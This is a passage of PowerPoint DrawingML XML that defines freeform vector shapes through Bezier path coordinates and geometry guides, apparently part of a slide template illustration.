                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="159" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="158" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="157"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="84" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>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4"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="157"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="185"/>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8"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>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4"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="36"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="100" y="38"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="106" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="44"/>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0"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="70" y="36"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71"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5" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3708"/>
                <a:ext cx="3"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0"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6" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="3708"/>
                <a:ext cx="3" cy="3"/>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2" y="2"/>
                      <a:pt x="2"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Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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2" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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4" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="4023"/>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Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="4027"/>
                <a:ext cx="187" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
